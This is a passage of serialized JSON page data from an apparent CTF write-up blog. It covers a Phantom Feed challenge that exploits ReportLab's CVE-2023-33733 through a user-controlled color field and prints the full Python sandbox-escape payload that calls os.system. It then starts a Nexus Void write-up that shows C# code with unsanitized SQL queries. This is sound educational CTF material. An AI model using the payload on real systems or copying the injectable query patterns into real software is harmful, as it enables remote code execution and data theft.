pdf",{"type":33,"tag":128,"props":34171,"children":34172},{"style":312},[34173],{"type":38,"value":215},{"type":33,"tag":128,"props":34175,"children":34176},{"style":323},[34177],{"type":38,"value":34178},"seek",{"type":33,"tag":128,"props":34180,"children":34181},{"style":312},[34182],{"type":38,"value":5566},{"type":33,"tag":128,"props":34184,"children":34185},{"style":523},[34186],{"type":38,"value":10442},{"type":33,"tag":128,"props":34188,"children":34189},{"style":312},[34190],{"type":38,"value":2427},{"type":33,"tag":128,"props":34192,"children":34193},{"class":130,"line":1127},[34194,34198,34203,34207,34212,34216,34221,34225,34229,34233,34238,34242,34246,34251,34255,34259,34264,34268,34272,34277,34281],{"type":33,"tag":128,"props":34195,"children":34196},{"style":1576},[34197],{"type":38,"value":13056},{"type":33,"tag":128,"props":34199,"children":34200},{"style":323},[34201],{"type":38,"value":34202}," send_file",{"type":33,"tag":128,"props":34204,"children":34205},{"style":312},[34206],{"type":38,"value":5566},{"type":33,"tag":128,"props":34208,"children":34209},{"style":323},[34210],{"type":38,"value":34211},"pdf",{"type":33,"tag":128,"props":34213,"children":34214},{"style":312},[34215],{"type":38,"value":5584},{"type":33,"tag":128,"props":34217,"children":34218},{"style":306},[34219],{"type":38,"value":34220}," as_attachment",{"type":33,"tag":128,"props":34222,"children":34223},{"style":312},[34224],{"type":38,"value":315},{"type":33,"tag":128,"props":34226,"children":34227},{"style":1576},[34228],{"type":38,"value":30424},{"type":33,"tag":128,"props":34230,"children":34231},{"style":312},[34232],{"type":38,"value":5584},{"type":33,"tag":128,"props":34234,"children":34235},{"style":306},[34236],{"type":38,"value":34237}," 
download_name",{"type":33,"tag":128,"props":34239,"children":34240},{"style":312},[34241],{"type":38,"value":315},{"type":33,"tag":128,"props":34243,"children":34244},{"style":676},[34245],{"type":38,"value":669},{"type":33,"tag":128,"props":34247,"children":34248},{"style":140},[34249],{"type":38,"value":34250},"orders.pdf",{"type":33,"tag":128,"props":34252,"children":34253},{"style":676},[34254],{"type":38,"value":669},{"type":33,"tag":128,"props":34256,"children":34257},{"style":312},[34258],{"type":38,"value":5584},{"type":33,"tag":128,"props":34260,"children":34261},{"style":306},[34262],{"type":38,"value":34263}," mimetype",{"type":33,"tag":128,"props":34265,"children":34266},{"style":312},[34267],{"type":38,"value":315},{"type":33,"tag":128,"props":34269,"children":34270},{"style":676},[34271],{"type":38,"value":669},{"type":33,"tag":128,"props":34273,"children":34274},{"style":140},[34275],{"type":38,"value":34276},"application/pdf",{"type":33,"tag":128,"props":34278,"children":34279},{"style":676},[34280],{"type":38,"value":669},{"type":33,"tag":128,"props":34282,"children":34283},{"style":312},[34284],{"type":38,"value":2427},{"type":33,"tag":47,"props":34286,"children":34287},{},[34288,34290,34295,34297,34303],{"type":38,"value":34289},"This route is responsible for generating a PDF document of all orders, with a specified color, and sending it as a downloadable file in the response to a POST request at the ",{"type":33,"tag":105,"props":34291,"children":34293},{"className":34292},[],[34294],{"type":38,"value":33717},{"type":38,"value":34296}," route. 
It uses the ",{"type":33,"tag":105,"props":34298,"children":34300},{"className":34299},[],[34301],{"type":38,"value":34302},"render_template",{"type":38,"value":34304}," function to render the orders.html template, which is then converted to a PDF using the HTML2PDF class.",{"type":33,"tag":47,"props":34306,"children":34307},{},[34308,34310,34315],{"type":38,"value":34309},"You can find below the ",{"type":33,"tag":105,"props":34311,"children":34313},{"className":34312},[],[34314],{"type":38,"value":34055},{"type":38,"value":34316}," template:",{"type":33,"tag":114,"props":34318,"children":34319},{"lang":5929},[34320],{"type":33,"tag":119,"props":34321,"children":34323},{"className":5933,"code":34322,"language":5929,"meta":8,"style":8},"\u003C!-- orders.html  -->\n\u003Cpara>\n    \u003Cfont color=\"{{ color }}\">\n        Orders:\n    \u003C/font>\n\u003C/para>\n",[34324],{"type":33,"tag":105,"props":34325,"children":34326},{"__ignoreMap":8},[34327,34335,34352,34389,34397,34412],{"type":33,"tag":128,"props":34328,"children":34329},{"class":130,"line":131},[34330],{"type":33,"tag":128,"props":34331,"children":34332},{"style":5541},[34333],{"type":38,"value":34334},"\u003C!-- orders.html  
-->\n",{"type":33,"tag":128,"props":34336,"children":34337},{"class":130,"line":362},[34338,34342,34348],{"type":33,"tag":128,"props":34339,"children":34340},{"style":312},[34341],{"type":38,"value":5977},{"type":33,"tag":128,"props":34343,"children":34345},{"style":34344},"--shiki-default:#FDAEB7",[34346],{"type":38,"value":34347},"para",{"type":33,"tag":128,"props":34349,"children":34350},{"style":312},[34351],{"type":38,"value":6097},{"type":33,"tag":128,"props":34353,"children":34354},{"class":130,"line":403},[34355,34359,34364,34368,34372,34376,34381,34385],{"type":33,"tag":128,"props":34356,"children":34357},{"style":312},[34358],{"type":38,"value":6105},{"type":33,"tag":128,"props":34360,"children":34361},{"style":20986},[34362],{"type":38,"value":34363},"font",{"type":33,"tag":128,"props":34365,"children":34366},{"style":306},[34367],{"type":38,"value":33858},{"type":33,"tag":128,"props":34369,"children":34370},{"style":312},[34371],{"type":38,"value":315},{"type":33,"tag":128,"props":34373,"children":34374},{"style":676},[34375],{"type":38,"value":669},{"type":33,"tag":128,"props":34377,"children":34378},{"style":140},[34379],{"type":38,"value":34380},"{{ color }}",{"type":33,"tag":128,"props":34382,"children":34383},{"style":676},[34384],{"type":38,"value":669},{"type":33,"tag":128,"props":34386,"children":34387},{"style":312},[34388],{"type":38,"value":6097},{"type":33,"tag":128,"props":34390,"children":34391},{"class":130,"line":739},[34392],{"type":33,"tag":128,"props":34393,"children":34394},{"style":323},[34395],{"type":38,"value":34396},"        
Orders:\n",{"type":33,"tag":128,"props":34398,"children":34399},{"class":130,"line":765},[34400,34404,34408],{"type":33,"tag":128,"props":34401,"children":34402},{"style":312},[34403],{"type":38,"value":14993},{"type":33,"tag":128,"props":34405,"children":34406},{"style":20986},[34407],{"type":38,"value":34363},{"type":33,"tag":128,"props":34409,"children":34410},{"style":312},[34411],{"type":38,"value":6097},{"type":33,"tag":128,"props":34413,"children":34414},{"class":130,"line":804},[34415,34419,34423],{"type":33,"tag":128,"props":34416,"children":34417},{"style":312},[34418],{"type":38,"value":6190},{"type":33,"tag":128,"props":34420,"children":34421},{"style":34344},[34422],{"type":38,"value":34347},{"type":33,"tag":128,"props":34424,"children":34425},{"style":312},[34426],{"type":38,"value":6097},{"type":33,"tag":47,"props":34428,"children":34429},{},[34430],{"type":38,"value":34431},"The class HTML2PDF is responsible for converting the HTML template to a PDF document. It uses the reportlab library to do this.",{"type":33,"tag":47,"props":34433,"children":34434},{},[34435],{"type":38,"value":34436},"Reportlab is an open-source project that allows generating PDF documents using the Python programming language. 
It supports the creation of graphics and data charts from various bitmap and vector formats, in addition to PDF.",{"type":33,"tag":114,"props":34438,"children":34439},{"lang":10227},[34440],{"type":33,"tag":119,"props":34441,"children":34443},{"className":10231,"code":34442,"language":10227,"meta":8,"style":8},"from reportlab.platypus import SimpleDocTemplate, Paragraph, Table, TableStyle\nfrom reportlab.lib.pagesizes import letter\nfrom reportlab.lib import colors\nfrom io import BytesIO\n\nclass HTML2PDF():\n    def __init__(self):\n        self.stream_file = BytesIO()\n        self.content = []\n\n[...]\n\n    def convert(self, html, data):\n        doc = self.get_document_template(self.stream_file)\n        self.add_paragraph(html)\n        self.add_table(data)\n        self.build_document(doc, self.content)\n        return self.stream_file\n",[34444],{"type":33,"tag":105,"props":34445,"children":34446},{"__ignoreMap":8},[34447,34504,34542,34571,34592,34599,34614,34637,34667,34692,34699,34714,34721,34761,34807,34835,34863,34908],{"type":33,"tag":128,"props":34448,"children":34449},{"class":130,"line":131},[34450,34455,34460,34464,34469,34473,34478,34482,34487,34491,34495,34499],{"type":33,"tag":128,"props":34451,"children":34452},{"style":1576},[34453],{"type":38,"value":34454},"from",{"type":33,"tag":128,"props":34456,"children":34457},{"style":323},[34458],{"type":38,"value":34459}," reportlab",{"type":33,"tag":128,"props":34461,"children":34462},{"style":312},[34463],{"type":38,"value":215},{"type":33,"tag":128,"props":34465,"children":34466},{"style":323},[34467],{"type":38,"value":34468},"platypus ",{"type":33,"tag":128,"props":34470,"children":34471},{"style":1576},[34472],{"type":38,"value":10244},{"type":33,"tag":128,"props":34474,"children":34475},{"style":323},[34476],{"type":38,"value":34477}," 
SimpleDocTemplate",{"type":33,"tag":128,"props":34479,"children":34480},{"style":312},[34481],{"type":38,"value":5584},{"type":33,"tag":128,"props":34483,"children":34484},{"style":323},[34485],{"type":38,"value":34486}," Paragraph",{"type":33,"tag":128,"props":34488,"children":34489},{"style":312},[34490],{"type":38,"value":5584},{"type":33,"tag":128,"props":34492,"children":34493},{"style":323},[34494],{"type":38,"value":26558},{"type":33,"tag":128,"props":34496,"children":34497},{"style":312},[34498],{"type":38,"value":5584},{"type":33,"tag":128,"props":34500,"children":34501},{"style":323},[34502],{"type":38,"value":34503}," TableStyle\n",{"type":33,"tag":128,"props":34505,"children":34506},{"class":130,"line":362},[34507,34511,34515,34519,34524,34528,34533,34537],{"type":33,"tag":128,"props":34508,"children":34509},{"style":1576},[34510],{"type":38,"value":34454},{"type":33,"tag":128,"props":34512,"children":34513},{"style":323},[34514],{"type":38,"value":34459},{"type":33,"tag":128,"props":34516,"children":34517},{"style":312},[34518],{"type":38,"value":215},{"type":33,"tag":128,"props":34520,"children":34521},{"style":323},[34522],{"type":38,"value":34523},"lib",{"type":33,"tag":128,"props":34525,"children":34526},{"style":312},[34527],{"type":38,"value":215},{"type":33,"tag":128,"props":34529,"children":34530},{"style":323},[34531],{"type":38,"value":34532},"pagesizes ",{"type":33,"tag":128,"props":34534,"children":34535},{"style":1576},[34536],{"type":38,"value":10244},{"type":33,"tag":128,"props":34538,"children":34539},{"style":323},[34540],{"type":38,"value":34541}," 
letter\n",{"type":33,"tag":128,"props":34543,"children":34544},{"class":130,"line":403},[34545,34549,34553,34557,34562,34566],{"type":33,"tag":128,"props":34546,"children":34547},{"style":1576},[34548],{"type":38,"value":34454},{"type":33,"tag":128,"props":34550,"children":34551},{"style":323},[34552],{"type":38,"value":34459},{"type":33,"tag":128,"props":34554,"children":34555},{"style":312},[34556],{"type":38,"value":215},{"type":33,"tag":128,"props":34558,"children":34559},{"style":323},[34560],{"type":38,"value":34561},"lib ",{"type":33,"tag":128,"props":34563,"children":34564},{"style":1576},[34565],{"type":38,"value":10244},{"type":33,"tag":128,"props":34567,"children":34568},{"style":323},[34569],{"type":38,"value":34570}," colors\n",{"type":33,"tag":128,"props":34572,"children":34573},{"class":130,"line":739},[34574,34578,34583,34587],{"type":33,"tag":128,"props":34575,"children":34576},{"style":1576},[34577],{"type":38,"value":34454},{"type":33,"tag":128,"props":34579,"children":34580},{"style":323},[34581],{"type":38,"value":34582}," io ",{"type":33,"tag":128,"props":34584,"children":34585},{"style":1576},[34586],{"type":38,"value":10244},{"type":33,"tag":128,"props":34588,"children":34589},{"style":323},[34590],{"type":38,"value":34591}," 
BytesIO\n",{"type":33,"tag":128,"props":34593,"children":34594},{"class":130,"line":765},[34595],{"type":33,"tag":128,"props":34596,"children":34597},{"emptyLinePlaceholder":896},[34598],{"type":38,"value":899},{"type":33,"tag":128,"props":34600,"children":34601},{"class":130,"line":804},[34602,34606,34610],{"type":33,"tag":128,"props":34603,"children":34604},{"style":300},[34605],{"type":38,"value":30336},{"type":33,"tag":128,"props":34607,"children":34608},{"style":30339},[34609],{"type":38,"value":34103},{"type":33,"tag":128,"props":34611,"children":34612},{"style":312},[34613],{"type":38,"value":10412},{"type":33,"tag":128,"props":34615,"children":34616},{"class":130,"line":839},[34617,34621,34625,34629,34633],{"type":33,"tag":128,"props":34618,"children":34619},{"style":300},[34620],{"type":38,"value":30678},{"type":33,"tag":128,"props":34622,"children":34623},{"style":437},[34624],{"type":38,"value":30683},{"type":33,"tag":128,"props":34626,"children":34627},{"style":312},[34628],{"type":38,"value":5566},{"type":33,"tag":128,"props":34630,"children":34631},{"style":323},[34632],{"type":38,"value":30091},{"type":33,"tag":128,"props":34634,"children":34635},{"style":312},[34636],{"type":38,"value":10497},{"type":33,"tag":128,"props":34638,"children":34639},{"class":130,"line":848},[34640,34645,34649,34654,34658,34663],{"type":33,"tag":128,"props":34641,"children":34642},{"style":151},[34643],{"type":38,"value":34644},"        self",{"type":33,"tag":128,"props":34646,"children":34647},{"style":312},[34648],{"type":38,"value":215},{"type":33,"tag":128,"props":34650,"children":34651},{"style":323},[34652],{"type":38,"value":34653},"stream_file ",{"type":33,"tag":128,"props":34655,"children":34656},{"style":312},[34657],{"type":38,"value":315},{"type":33,"tag":128,"props":34659,"children":34660},{"style":323},[34661],{"type":38,"value":34662}," 
BytesIO",{"type":33,"tag":128,"props":34664,"children":34665},{"style":312},[34666],{"type":38,"value":7857},{"type":33,"tag":128,"props":34668,"children":34669},{"class":130,"line":976},[34670,34674,34678,34683,34687],{"type":33,"tag":128,"props":34671,"children":34672},{"style":151},[34673],{"type":38,"value":34644},{"type":33,"tag":128,"props":34675,"children":34676},{"style":312},[34677],{"type":38,"value":215},{"type":33,"tag":128,"props":34679,"children":34680},{"style":323},[34681],{"type":38,"value":34682},"content ",{"type":33,"tag":128,"props":34684,"children":34685},{"style":312},[34686],{"type":38,"value":315},{"type":33,"tag":128,"props":34688,"children":34689},{"style":312},[34690],{"type":38,"value":34691}," []\n",{"type":33,"tag":128,"props":34693,"children":34694},{"class":130,"line":988},[34695],{"type":33,"tag":128,"props":34696,"children":34697},{"emptyLinePlaceholder":896},[34698],{"type":38,"value":899},{"type":33,"tag":128,"props":34700,"children":34701},{"class":130,"line":1001},[34702,34706,34710],{"type":33,"tag":128,"props":34703,"children":34704},{"style":312},[34705],{"type":38,"value":344},{"type":33,"tag":128,"props":34707,"children":34708},{"style":151},[34709],{"type":38,"value":29750},{"type":33,"tag":128,"props":34711,"children":34712},{"style":312},[34713],{"type":38,"value":3262},{"type":33,"tag":128,"props":34715,"children":34716},{"class":130,"line":1014},[34717],{"type":33,"tag":128,"props":34718,"children":34719},{"emptyLinePlaceholder":896},[34720],{"type":38,"value":899},{"type":33,"tag":128,"props":34722,"children":34723},{"class":130,"line":1026},[34724,34728,34733,34737,34741,34745,34749,34753,34757],{"type":33,"tag":128,"props":34725,"children":34726},{"style":300},[34727],{"type":38,"value":30678},{"type":33,"tag":128,"props":34729,"children":34730},{"style":135},[34731],{"type":38,"value":34732}," 
convert",{"type":33,"tag":128,"props":34734,"children":34735},{"style":312},[34736],{"type":38,"value":5566},{"type":33,"tag":128,"props":34738,"children":34739},{"style":323},[34740],{"type":38,"value":30091},{"type":33,"tag":128,"props":34742,"children":34743},{"style":312},[34744],{"type":38,"value":5584},{"type":33,"tag":128,"props":34746,"children":34747},{"style":323},[34748],{"type":38,"value":14570},{"type":33,"tag":128,"props":34750,"children":34751},{"style":312},[34752],{"type":38,"value":5584},{"type":33,"tag":128,"props":34754,"children":34755},{"style":323},[34756],{"type":38,"value":13545},{"type":33,"tag":128,"props":34758,"children":34759},{"style":312},[34760],{"type":38,"value":10497},{"type":33,"tag":128,"props":34762,"children":34763},{"class":130,"line":1038},[34764,34769,34773,34777,34781,34786,34790,34794,34798,34803],{"type":33,"tag":128,"props":34765,"children":34766},{"style":323},[34767],{"type":38,"value":34768},"        doc ",{"type":33,"tag":128,"props":34770,"children":34771},{"style":312},[34772],{"type":38,"value":315},{"type":33,"tag":128,"props":34774,"children":34775},{"style":151},[34776],{"type":38,"value":30721},{"type":33,"tag":128,"props":34778,"children":34779},{"style":312},[34780],{"type":38,"value":215},{"type":33,"tag":128,"props":34782,"children":34783},{"style":323},[34784],{"type":38,"value":34785},"get_document_template",{"type":33,"tag":128,"props":34787,"children":34788},{"style":312},[34789],{"type":38,"value":5566},{"type":33,"tag":128,"props":34791,"children":34792},{"style":151},[34793],{"type":38,"value":30091},{"type":33,"tag":128,"props":34795,"children":34796},{"style":312},[34797],{"type":38,"value":215},{"type":33,"tag":128,"props":34799,"children":34800},{"style":323},[34801],{"type":38,"value":34802},"stream_file",{"type":33,"tag":128,"props":34804,"children":34805},{"style":312},[34806],{"type":38,"value":2427},{"type":33,"tag":128,"props":34808,"children":34809},{"class":130,"line":1051},[34810,34814
,34818,34823,34827,34831],{"type":33,"tag":128,"props":34811,"children":34812},{"style":151},[34813],{"type":38,"value":34644},{"type":33,"tag":128,"props":34815,"children":34816},{"style":312},[34817],{"type":38,"value":215},{"type":33,"tag":128,"props":34819,"children":34820},{"style":323},[34821],{"type":38,"value":34822},"add_paragraph",{"type":33,"tag":128,"props":34824,"children":34825},{"style":312},[34826],{"type":38,"value":5566},{"type":33,"tag":128,"props":34828,"children":34829},{"style":323},[34830],{"type":38,"value":5929},{"type":33,"tag":128,"props":34832,"children":34833},{"style":312},[34834],{"type":38,"value":2427},{"type":33,"tag":128,"props":34836,"children":34837},{"class":130,"line":1063},[34838,34842,34846,34851,34855,34859],{"type":33,"tag":128,"props":34839,"children":34840},{"style":151},[34841],{"type":38,"value":34644},{"type":33,"tag":128,"props":34843,"children":34844},{"style":312},[34845],{"type":38,"value":215},{"type":33,"tag":128,"props":34847,"children":34848},{"style":323},[34849],{"type":38,"value":34850},"add_table",{"type":33,"tag":128,"props":34852,"children":34853},{"style":312},[34854],{"type":38,"value":5566},{"type":33,"tag":128,"props":34856,"children":34857},{"style":323},[34858],{"type":38,"value":2815},{"type":33,"tag":128,"props":34860,"children":34861},{"style":312},[34862],{"type":38,"value":2427},{"type":33,"tag":128,"props":34864,"children":34865},{"class":130,"line":1076},[34866,34870,34874,34879,34883,34888,34892,34896,34900,34904],{"type":33,"tag":128,"props":34867,"children":34868},{"style":151},[34869],{"type":38,"value":34644},{"type":33,"tag":128,"props":34871,"children":34872},{"style":312},[34873],{"type":38,"value":215},{"type":33,"tag":128,"props":34875,"children":34876},{"style":323},[34877],{"type":38,"value":34878},"build_document",{"type":33,"tag":128,"props":34880,"children":34881},{"style":312},[34882],{"type":38,"value":5566},{"type":33,"tag":128,"props":34884,"children":34885},{"style":323},[
34886],{"type":38,"value":34887},"doc",{"type":33,"tag":128,"props":34889,"children":34890},{"style":312},[34891],{"type":38,"value":5584},{"type":33,"tag":128,"props":34893,"children":34894},{"style":151},[34895],{"type":38,"value":30721},{"type":33,"tag":128,"props":34897,"children":34898},{"style":312},[34899],{"type":38,"value":215},{"type":33,"tag":128,"props":34901,"children":34902},{"style":323},[34903],{"type":38,"value":5242},{"type":33,"tag":128,"props":34905,"children":34906},{"style":312},[34907],{"type":38,"value":2427},{"type":33,"tag":128,"props":34909,"children":34910},{"class":130,"line":1089},[34911,34915,34919,34923],{"type":33,"tag":128,"props":34912,"children":34913},{"style":1576},[34914],{"type":38,"value":13615},{"type":33,"tag":128,"props":34916,"children":34917},{"style":151},[34918],{"type":38,"value":30721},{"type":33,"tag":128,"props":34920,"children":34921},{"style":312},[34922],{"type":38,"value":215},{"type":33,"tag":128,"props":34924,"children":34925},{"style":323},[34926],{"type":38,"value":34927},"stream_file\n",{"type":33,"tag":47,"props":34929,"children":34930},{},[34931,34933,34939],{"type":38,"value":34932},"This library is known to be vulnerable to RCE attacks. The vulnerability is present due to inadequate validation within the ",{"type":33,"tag":105,"props":34934,"children":34936},{"className":34935},[],[34937],{"type":38,"value":34938},"rl_safe_eval",{"type":38,"value":34940}," function; an attacker can insert malicious code into an HTML document, which will then be converted into a PDF by software that relies on the ReportLab library. To exploit this vulnerability, the entire malicious code must be evaluated within a single expression. 
This vulnerability is referenced as CVE-2023-33733.",{"type":33,"tag":47,"props":34942,"children":34943},{},[34944,34946,34953],{"type":38,"value":34945},"For more details, ",{"type":33,"tag":53,"props":34947,"children":34950},{":target":21222,"href":34948,"rel":34949},"https://github.com/c53elyas/CVE-2023-33733",[57],[34951],{"type":38,"value":34952},"the article of c53elyas",{"type":38,"value":34954}," explains the vulnerability in depth.",{"type":33,"tag":47,"props":34956,"children":34957},{},[34958],{"type":33,"tag":2572,"props":34959,"children":34960},{},[34961],{"type":38,"value":34962},"It is important to note that this exploit is only possible if the application allow hostile input to be passed into colors. This is exactly our case, as we control the variable color that is used in the render_template function.",{"type":33,"tag":47,"props":34964,"children":34965},{},[34966],{"type":38,"value":34967},"The payload that will be executed to exploit the RCE during our final exploit is as follows:",{"type":33,"tag":114,"props":34969,"children":34970},{"lang":25649},[34971],{"type":33,"tag":119,"props":34972,"children":34974},{"className":27370,"code":34973,"language":25649,"meta":8,"style":8},"[[[getattr(pow, Word('__globals__'))['os'].system('echo pwned') for Word in [ orgTypeFun( 'Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: 1 == 0, '__eq__': lambda self, x: self.mutate() and self.mutated \u003C 0 and str(self) == x, 'mutate': lambda self: { setattr(self, 'mutated', self.mutated - 1) }, '__hash__': lambda self: hash(str(self)), }, ) ] ] for orgTypeFun in [type(type(1))] for none in [[].append(1)]]] and 
'red'\n",[34975],{"type":33,"tag":105,"props":34976,"children":34977},{"__ignoreMap":8},[34978],{"type":33,"tag":128,"props":34979,"children":34980},{"class":130,"line":131},[34981],{"type":33,"tag":128,"props":34982,"children":34983},{},[34984],{"type":38,"value":34973},{"type":33,"tag":47,"props":34986,"children":34987},{},[34988],{"type":38,"value":34989},"Here is the final request that will allow us to exploit the vulnerability:",{"type":33,"tag":75,"props":34991,"children":34993},{"imgSrc":34992},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1704322788/writeups/phantom-feed/last_request.webp",[],{"type":33,"tag":47,"props":34995,"children":34996},{},[34997],{"type":38,"value":34998},"We can see the flag sent successfully to our collaborator:",{"type":33,"tag":75,"props":35000,"children":35002},{"imgSrc":35001},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1704322779/writeups/phantom-feed/flag_collaborator.webp",[],{"type":33,"tag":5227,"props":35004,"children":35005},{},[35006],{"type":38,"value":5231},{"title":8,"searchDepth":362,"depth":131,"links":35008},[35009,35010,35011,35012,35013],{"id":42,"depth":362,"text":45},{"id":29558,"depth":362,"text":29561},{"id":31444,"depth":362,"text":31447},{"id":32140,"depth":362,"text":32143},{"id":33667,"depth":362,"text":33670},"content:writeups:phantom-feed.md","writeups/phantom-feed.md","writeups/phantom-feed",{"_path":35018,"_dir":6,"_draft":7,"_partial":7,"_locale":8,"title":35019,"description":8,"head":35020,"body":35037,"_type":5240,"_id":40188,"_source":5242,"_file":40189,"_stem":40190,"_extension":5245},"/writeups/nexus-void","Nexus Void",{"title":35019,"description":35021,"keywords":35022,"slug":35023,"image":29235,"date":35024,"meta":35025},"Writeup of Nexus Void, a medium web challenge from htb-uni ctf 2023. 
Is about sql injection and deserialization.","web,sqli,deserialization","nexus-void","2023-12-07",[35026,35027,35029,35030,35031,35033,35034,35035],{"og:image":29235},{"og:title":35028},"Nexus Void writeup",{"og:description":35021},{"og:type":21},{"og:url":35032},"https://owalid.com/nexus-void",{"description":35021},{"title":35028},{"keywords":35036},"web,sqli,deserialization,htb,ctf,writeup",{"type":30,"children":35038,"toc":40182},[35039,35043,35047,35052,35056,35062,35067,35072,36584,36589,36595,36600,36605,37022,37027,37684,37692,37698,37703,37708,37713,37718,37723,37728,37733,37738,38383,38388,38399,38405,38410,38423,38593,38598,38609,38629,38639,38644,38657,39104,39117,39829,39841,39846,39852,39857,39863,39875,39880,39972,39977,39982,40001,40012,40018,40023,40028,40032,40037,40041,40046,40050,40062,40131,40143,40148,40156,40160,40165,40169,40174,40178],{"type":33,"tag":34,"props":35040,"children":35041},{"id":35023},[35042],{"type":38,"value":35019},{"type":33,"tag":40,"props":35044,"children":35045},{"id":42},[35046],{"type":38,"value":45},{"type":33,"tag":47,"props":35048,"children":35049},{},[35050],{"type":38,"value":35051},"Nexus Void is a medium web challenge from htb-uni ctf 2023. Is about sql injection and deserialization. The code is written in c# and the database is sqlite.",{"type":33,"tag":75,"props":35053,"children":35055},{"imgSrc":35054,":width":29267},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1704402027/writeups/nexus-void/architecture_challenge.webp",[],{"type":33,"tag":40,"props":35057,"children":35059},{"id":35058},"sqli",[35060],{"type":38,"value":35061},"Sqli",{"type":33,"tag":47,"props":35063,"children":35064},{},[35065],{"type":38,"value":35066},"If we carefully read the source code, we can see that no query to the database is protected. 
They are all vulnerable to SQL injection.",{"type":33,"tag":47,"props":35068,"children":35069},{},[35070],{"type":38,"value":35071},"Here are some examples below:",{"type":33,"tag":114,"props":35073,"children":35075},{"lang":35074},"csharp",[35076],{"type":33,"tag":119,"props":35077,"children":35080},{"code":35078,"language":35074,"meta":8,"className":35079,"style":8},"// Controllers/HomeController.cs\npublic IActionResult Wishlist()\n{\n    string ID = HttpContext.Items[\"ID\"].ToString();\n    string sqlQueryGetWishlist = $\"SELECT * from Wishlist WHERE ID='{ID}'\"; // \u003C--- SQLI\n\n    [...]\n}\n[...]\n\npublic IActionResult Wishlist(string name, string sellerName)\n{\n    string ID = HttpContext.Items[\"ID\"].ToString();\n    string sqlQueryGetWishlist = $\"SELECT * from Wishlist WHERE ID={ID}\"; // \u003C--- SQLI\n    var wishlist = _db.Wishlist.FromSqlRaw(sqlQueryGetWishlist).FirstOrDefault();\n    string sqlQueryProduct = $\"SELECT * from Products WHERE name='{name}' AND sellerName='{sellerName}'\"; // \u003C--- SQLI\n    var product = _db.Products.FromSqlRaw(sqlQueryProduct).FirstOrDefault();\n    if(!string.IsNullOrEmpty(product.name))\n    {\n        if (wishlist != null && !string.IsNullOrEmpty(wishlist.data))\n        {\n            List\u003CProductModel> products = SerializeHelper.Deserialize(wishlist.data);\n            ProductModel result = products.Find(x => x.name == product.name);\n\n            if (result != null)\n            {\n                return Content(\"Product already exists\");\n            }\n\n            products.Add(product);\n            string serializedData = SerializeHelper.Serialize(products);\n            string sqlQueryAddWishlist = $\"UPDATE Wishlist SET data='{serializedData}' WHERE ID={ID}\"; // \u003C--- SQLI\n            _db.Database.ExecuteSqlRaw(sqlQueryAddWishlist);\n        }\n        else\n        {\n            string username = HttpContext.Items[\"username\"].ToString();\n            List\u003CProductModel> 
wishListProducts = new List\u003CProductModel>();\n            wishListProducts.Add(product);\n            string serializedData = SerializeHelper.Serialize(wishListProducts);\n            string sqlQueryAddWishlist = $\"INSERT INTO Wishlist(ID, username, data) VALUES({ID},'{username}', '{serializedData}')\"; // \u003C--- SQLI\n            _db.Database.ExecuteSqlRaw(sqlQueryAddWishlist);\n        }\n        return Content(\"Added\");\n    }\n    return Content(\"Invalid\");\n}\n","language-csharp shiki shiki-themes vitesse-dark",[35081],{"type":33,"tag":105,"props":35082,"children":35083},{"__ignoreMap":8},[35084,35092,35113,35120,35181,35237,35244,35265,35272,35287,35294,35340,35347,35402,35450,35512,35583,35641,35690,35697,35764,35772,35836,35911,35918,35947,35955,35989,35997,36004,36033,36076,36143,36182,36189,36197,36204,36260,36310,36338,36378,36465,36500,36507,36539,36546,36577],{"type":33,"tag":128,"props":35085,"children":35086},{"class":130,"line":131},[35087],{"type":33,"tag":128,"props":35088,"children":35089},{"style":5541},[35090],{"type":38,"value":35091},"// Controllers/HomeController.cs\n",{"type":33,"tag":128,"props":35093,"children":35094},{"class":130,"line":362},[35095,35099,35104,35109],{"type":33,"tag":128,"props":35096,"children":35097},{"style":300},[35098],{"type":38,"value":25953},{"type":33,"tag":128,"props":35100,"children":35101},{"style":30339},[35102],{"type":38,"value":35103}," IActionResult",{"type":33,"tag":128,"props":35105,"children":35106},{"style":135},[35107],{"type":38,"value":35108}," 
Wishlist",{"type":33,"tag":128,"props":35110,"children":35111},{"style":312},[35112],{"type":38,"value":7857},{"type":33,"tag":128,"props":35114,"children":35115},{"class":130,"line":403},[35116],{"type":33,"tag":128,"props":35117,"children":35118},{"style":312},[35119],{"type":38,"value":650},{"type":33,"tag":128,"props":35121,"children":35122},{"class":130,"line":739},[35123,35128,35133,35137,35142,35146,35151,35155,35159,35164,35168,35172,35177],{"type":33,"tag":128,"props":35124,"children":35125},{"style":1576},[35126],{"type":38,"value":35127},"    string",{"type":33,"tag":128,"props":35129,"children":35130},{"style":135},[35131],{"type":38,"value":35132}," ID",{"type":33,"tag":128,"props":35134,"children":35135},{"style":312},[35136],{"type":38,"value":5657},{"type":33,"tag":128,"props":35138,"children":35139},{"style":306},[35140],{"type":38,"value":35141}," HttpContext",{"type":33,"tag":128,"props":35143,"children":35144},{"style":312},[35145],{"type":38,"value":215},{"type":33,"tag":128,"props":35147,"children":35148},{"style":306},[35149],{"type":38,"value":35150},"Items",{"type":33,"tag":128,"props":35152,"children":35153},{"style":312},[35154],{"type":38,"value":344},{"type":33,"tag":128,"props":35156,"children":35157},{"style":676},[35158],{"type":38,"value":669},{"type":33,"tag":128,"props":35160,"children":35161},{"style":140},[35162],{"type":38,"value":35163},"ID",{"type":33,"tag":128,"props":35165,"children":35166},{"style":676},[35167],{"type":38,"value":669},{"type":33,"tag":128,"props":35169,"children":35170},{"style":312},[35171],{"type":38,"value":8230},{"type":33,"tag":128,"props":35173,"children":35174},{"style":135},[35175],{"type":38,"value":35176},"ToString",{"type":33,"tag":128,"props":35178,"children":35179},{"style":312},[35180],{"type":38,"value":15496},{"type":33,"tag":128,"props":35182,"children":35183},{"class":130,"line":765},[35184,35188,35193,35197,35202,35207,35211,35215,35219,35223,35227,35232],{"type":33,"tag":128,"props":3518
